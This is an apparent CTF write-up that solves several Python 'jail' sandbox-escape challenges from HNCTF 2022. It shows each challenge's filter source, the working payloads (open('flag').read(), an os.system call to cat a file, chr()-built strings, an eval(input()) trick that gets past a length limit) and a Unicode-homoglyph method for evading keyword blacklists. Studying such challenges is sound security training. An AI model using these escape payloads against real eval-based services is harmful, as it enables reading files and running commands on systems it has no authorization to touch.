Jail [Python sandbox escape problem collection]

Based on challenges from the NSS platform, with HNCTF 2022 as the worked example. Background:

Since pyjail challenges now show up in many competitions, this post collects them so that they can be handled easily the next time one comes up.

Note: because Python 3 NFKC-normalizes Unicode identifiers, unicode-collision challenges also appear; the script below can be used to obtain some commonly used colliding unicode characters.

exp:
from unicodedata import normalize
from string import ascii_lowercase
from collections import defaultdict

lst = list(ascii_lowercase)
dic = defaultdict(list)

# For every lowercase letter, collect up to 10 code points whose NFKC
# normalization is that letter (the ASCII letter itself is among them).
for char in lst:
    for i in range(0x110000):
        if normalize("NFKC", chr(i)) == char:
            dic[char].append(chr(i))
            if len(dic[char]) > 9:
                break

print(dic)

calc_jail_beginner(JAIL)
Connect to the target machine and enter the challenge
nc node5.anna.nssctf.cn 28565
_ ______ _ _ _ _
| | |____| (_) | | (_) |
| |__ | |__ __ _ _ _ ___ __ ___ _ __ | | __ _ _| |
| '_ \|__| / _` | | '_ \| '_ \ / _ \ '__|_ | |/ _` | | |
| |_) | |___| (_| | | | | | | | |__/ | | |__| | (_| | | |
|_.__/|______\__, |_|_| |_|_| |_|\___|_| \____/ \__,_|_|_|
__/ |
|___/
Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
>
Warm-up challenge, solved in one shot:
open("flag").read()

Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> open("flag").read()
Answer: flag=NSSCTF{25df994d-430f-498d-a4dd-ddb660ada60e}

python2 input(JAIL)
Connect to the target machine and enter the challenge
nc node5.anna.nssctf.cn 28167
_ _ ___ ___ _____ _ _ _
| | | | / _ \ |__ \|_ _| | || | |
_ ___ _| |_| |__ | | | |_ __ ) | | |_ ___ __ | || | |_
| '_ \| | | | __| '_ \| | | | '_ \/ / | | | '_ \| '_ \| || | __|
| |_) | |_| | |_| | | | |_| | | | |/ /_ _| |_| | | | |_) | |__| | |_
| .__/ \__, |\__|_| |_|\___/|_| |_|____| |_____|_| |_| .__/ \____/ \__|
| | __/ | | |
|_| |___/ |_|
Welcome to the python jail
But this program will repeat your messages
> __import__("os").system("cat flag")

Welcome to the python jail
But this program will repeat your messages
> __import__("os").system("cat flag")
flag=NSSCTF{2d86dce6-3763-438d-9e8e-554b267c1da6}
0

calc_jail_beginner_level1(JAIL)
Attachment info

#the function of filter will banned some string ',",i,b
#it seems banned some payload
#Can u escape it?Good luck!
def filter(s):
    not_allowed = set('"\'`ib')
    return any(c in not_allowed for c in s)

WELCOME = '''
_ _ _ _ _ _ _ __
| | (_) (_) (_) | | | | /_ |
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | | _____ _____| || |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ || |
| |_) |__/ (_| | | | | | | | |__/ | | | (_| | | | | |__/\ V /__/ || |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_||_|
__/ | _/ |
|___/ |__/
'''
print(WELCOME)
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if filter(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))

Connect to the target machine and enter the challenge
nc node5.anna.nssctf.cn 28239
_ _ _ _ _ _ _ __
| | (_) (_) (_) | | | | /_ |
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | | _____ _____| || |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ || |
| |_) |__/ (_| | | | | | | | |__/ | | | (_| | | | | |__/\ V /__/ || |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_||_|
__/ | _/ |
|___/ |__/
Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
>
Some characters are filtered, so the file name "flag" is built from chr() calls instead:
open(chr(102)+chr(108)+chr(97)+chr(103)).read()

Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> open(chr(102)+chr(108)+chr(97)+chr(103)).read()
Answer: flag=NSSCTF{37ce5cec-7057-42d9-97fd-09b4ebc0e443}

calc_jail_beginner_level2(JAIL)
Attachment info

#the length is be limited less than 13
#it seems banned some payload
#Can u escape it?Good luck!
WELCOME = '''
_ _ _ _ _ _ _ ___
| | (_) (_) (_) | | | | |__ \
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | | _____ _____| |) |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | / /
| |_) |__/ (_| | | | | | | | |__/ | | | (_| | | | | |__/\ V /__/ |/ /_
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|____|
__/ | _/ |
|___/ |__/
'''
print(WELCOME)
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if len(input_data)>13:
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))

Connect to the target machine
nc node5.anna.nssctf.cn 28837
_ _ _ _ _ _ _ ___
| | (_) (_) (_) | | | | |__ \
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | | _____ _____| |) |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | / /
| |_) |__/ (_| | | | | | | | |__/ | | | (_| | | | | |__/\ V /__/ |/ /_
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|____|
__/ | _/ |
|___/ |__/
Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
>
The input length is limited to at most 13 characters.
eval(input()) is exactly 13 characters; it reads a second line that is not length-limited and executes it.

Welcome to the python jail
Let's have an beginner jail of calc
Enter your expression and I will evaluate it for you.
> eval(input())
open("flag").read()
Answer: flag=NSSCTF{48ba857a-34ec-4f31-ad69-726ef76d28c8}

calc_jail_beginner_level2.5(JAIL)
Attachment info

#the length is be limited less than 13
#it seems banned some payload
#banned some unintend sol
#Can u escape it?Good luck!
def filter(s):
    BLACKLIST = ["exec","input","eval"]
    for i in BLACKLIST:
        if i in s:
            print(f'{i!r} has been banned for security reasons')
            exit(0)

WELCOME = '''
_ _ _ _ _ _ _ ___ _____
| | (_) (_) (_) | | | |__ \| ____|
| |__ _____ _ _ _ ___ __ ___ _ __ ___ _ _| | | _____ _____| |) | | |__
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ | / /|___ \
| |_) |__/ (_| | | | | | | | |__/ | | | (_| | | | |__/\ V /__/ |/ /_ _ ___) |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____(_)____/
__/ | _/ |
|___/ |__/
'''
print(WELCOME)
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
filter(input_data)
if len(input_data)>13:
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))

Level 2.5 builds on level 2 with both a filter and a length limit. A quick probe shows that roughly the strings eval, input and exec are banned, but Python has unicode injection, so the level 2 payload can be reused with its characters swapped for unicode look-alikes; the collision script from the background section produces them.